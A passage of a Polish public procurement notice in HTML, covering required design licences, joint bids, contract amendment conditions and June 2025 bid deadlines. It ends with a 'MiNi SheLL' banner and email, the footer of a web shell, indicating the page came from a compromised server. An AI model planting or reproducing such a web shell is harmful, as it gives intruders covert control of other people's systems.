reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>2) Wykazu osób na podstawie wzoru stanowiącego Załącznik nr 5 do SWZ, z którego wynikać będzie, że Wykonawca dysponuje lub<br/>będzie dysponował co najmniej po jednej osobie posiadającej uprawnienia budowlane (w myśl Rozdziału 2 ustawy Prawo<br/>budowlane):<br/> do projektowania w specjalności architektonicznej bez ograniczeń, będące ważne od co najmniej 5 lat (licząc od daty wydania<br/>decyzji przyznającej uprawnienia),<br/> do projektowania w specjalności inżynieryjnej konstrukcyjno-budowlanej bez ograniczeń, będące ważne od co najmniej 5 lat (licząc<br/>od daty wydania decyzji przyznającej uprawnienia),<br/> do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez<br/>ograniczeń,<br/> do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń,<br/> do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych bez ograniczeń.<br/>wraz z informacjami na temat jej kwalifikacji zawodowych, uprawnień, doświadczenia<br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nią czynności oraz<br/>informacją o podstawie do dysponowania tą osobą.<br/>Wymagana forma:<br/>Dokument musi być złożony w formie elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców<br/>zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku:<br/>• Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>− Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony przewidują możliwość zmiany umowy. Zmiany zawartej umowy mogą nastąpić<br/>za zgodą Zamawiającego, w formie aneksu, w następujących przypadkach:<br/>1) gdy ulegnie zmianie stan prawny w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany<br/>sposobu wykonania zamówienia przez Wykonawcę,<br/>2) gdy wystąpią okoliczności skutkujące potrzebą zmiany terminu realizacji zamówienia takie jak:<br/>a) zmiana stanu prawnego w zakresie objętym zamówieniem, który spowoduje konieczność zmiany sposobu wykonania<br/>zamówienia przez Wykonawcę,<br/>b) wydłużenie czasu trwania procedur uzgodnień administracyjnych, mających wpływ na termin wykonania, co nie wynika z<br/>winy Wykonawcy. Za przeciętny czas trwania procedur administracyjnych Zamawiający rozumie czas ustawowo<br/>przewidziany przez wszelkie instytucje i urzędy na wydanie niezbędnych opinii, decyzji, uzgodnień<br/>z uwzględnieniem procedur nieprzewidzianych pobocznych, które mogą wyniknąć w trakcie trwania procedur<br/>administracyjnych,<br/>c) konieczność wykonania dodatkowych opracowań, usług projektowych,<br/>d) przeszkody o obiektywnym charakterze, zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia oraz innych<br/>zdarzeń, których przyczyny nie leżą po stronie Wykonawcy, takie jak: nadzwyczajne zjawiska przyrody oraz klęski<br/>żywiołowe (między innymi trzęsienia ziemi, powodzie, huragany), zdarzenia wywołane przez człowieka, np. działania<br/>wojenne, terrorystyczne, strajki czy gwałtowne rozruchy oraz akty władzy publicznej (fait du prince), którym należy się<br/>podporządkować, epidemie („siła wyższa”), a także działania proceduralne nieleżące po stronie Wykonawcy (np.<br/>niedostarczenie przez Zamawiającego niezbędnych decyzji, uzgodnień lub pełnomocnictw, przedłużające się uzgodnienia w<br/>organach np. nadzoru budowlanego bądź administracji budowlanej, u operatorów sieci itp.),<br/>e) opóźnienia, utrudnienia lub przeszkody spowodowane przez Zamawiającego lub dające się przypisać Zamawiającemu<br/>lub innemu Wykonawcy, bądź Podmiotowi działającemu za zgodą Zamawiającego,<br/>f) skorzystanie przez Zamawiającego z prawa, o którym mowa w § 12 ust. 6,<br/>g) brak dostępu z przyczyn niezależnych od Wykonawcy do miejsc, do których dostęp Wykonawcy jest niezbędny w celu<br/>dokonania badań, inwentaryzacji, pomiarów lub innego typu opracowań wymaganych z uwagi na proces sporządzania<br/>dokumentacji projektowej,<br/>h) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub<br/>techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania<br/>umowy, zgodnie ze specyfikacją istotnych warunków zamówienia – Zamawiający dopuszcza możliwość zmiany umowy, w<br/>szczególności terminu realizacji zamówienia.<br/>3) zmiany numeru rachunku bankowego Wykonawcy,<br/>4) zmiany wynagrodzenia, o którym mowa w § 9 ust. 1, związane z koniecznością rezygnacji przez Zamawiającego z<br/>wykonania części zamówienia,<br/>5) zmiany wynagrodzenia, o którym mowa w § 9 ust. 1, w zakresie do 10% wartości wynagrodzenia, związane ze zleceniem<br/>Wykonawcy dodatkowych usług projektowych, nieobjętych podstawowym zakresem przedmiotu umowy,<br/>6) zmiany wynagrodzenia, o którym mowa w § 9 ust. 1, w zakresie do 50% wartości wynagrodzenia, związane z<br/>koniecznością zrealizowania przez Wykonawcę dodatkowych opracowań, usług projektowych, nieobjętych podstawowym<br/>zakresem przedmiotu umowy, o ile staną się one niezbędne, przy spełnieniu przesłanek określonych w art. 455 ust. 1<br/>ustawy Prawo zamówień publicznych.<br/>Dalsza część zapisów dotyczących zmian do umowy znajduje się we wzorze umowy § 6 ust. 2 - Załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-16 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pm_szczecin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-16 11:35</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com